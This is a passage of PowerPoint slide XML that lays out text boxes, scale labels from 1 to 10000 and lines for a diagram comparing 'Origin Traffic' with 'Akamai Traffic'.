        <p:nvSpPr>
          <p:cNvPr id="567" name="Text Box 131"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="628188" y="7016116"/>
            <a:ext cx="381902" cy="270827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="Text Box 132"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="411048" y="6526532"/>
            <a:ext cx="513331" cy="270827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="Line 133"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="991043" y="6172200"/>
            <a:ext cx="400950" cy="1906"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570" name="Text Box 134"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="307237" y="6035042"/>
            <a:ext cx="644758" cy="270827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Text Box 135"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="135810" y="5104450"/>
            <a:ext cx="908566" cy="270827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572" name="Text Box 136"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="338664" y="4443781"/>
            <a:ext cx="1123805" cy="640159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Origin Traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="573" name="Rectangle 137"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1221521" y="5241610"/>
            <a:ext cx="170475" cy="1930717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54850" tIns="27424" rIns="54850" bIns="27424" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" baseline="-25000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="Line 138"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="981519" y="5245418"/>
            <a:ext cx="400950" cy="1906"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="575" name="Line 139"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="991043" y="6667500"/>
            <a:ext cx="400950" cy="1906"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="Line 140"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="991043" y="7178040"/>
            <a:ext cx="400950" cy="1906"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="577" name="Line 141"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="980571" y="5694045"/>
            <a:ext cx="403806" cy="1906"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="578" name="Text Box 142"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="159622" y="5563556"/>
            <a:ext cx="776187" cy="270827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="579" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1592620" y="4375052"/>
            <a:ext cx="1344878" cy="3024730"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54850" tIns="27424" rIns="54850" bIns="27424" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1306018">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Verdana" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="580" name="Line 133"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2386203" y="6153912"/>
            <a:ext cx="400950" cy="1906"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581" name="Text Box 136"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1665256" y="4425492"/>
            <a:ext cx="1245766" cy="640159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Akamai Traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="582" name="Rectangle 137"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2616683" y="5223322"/>
            <a:ext cx="170475" cy="1930717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54850" tIns="27424" rIns="54850" bIns="27424" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" baseline="-25000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="Line 138"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2376680" y="5227130"/>
            <a:ext cx="400950" cy="1906"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="584" name="Line 139"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2386203" y="6649212"/>
            <a:ext cx="400950" cy="1906"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="585" name="Line 140"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2386203" y="7159752"/>
            <a:ext cx="400950" cy="1906"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="586" name="Line 141"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2375731" y="5675757"/>
            <a:ext cx="403806" cy="1906"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="590" name="Text Box 131"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2030207" y="6987542"/>
            <a:ext cx="381902" cy="270827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="591" name="Text Box 132"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1813064" y="6497956"/>
            <a:ext cx="513331" cy="270827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592" name="Text Box 134"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1709255" y="6006466"/>
            <a:ext cx="644758" cy="270827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593" name="Text Box 135"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1537827" y="5075876"/>
            <a:ext cx="908566" cy="270827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
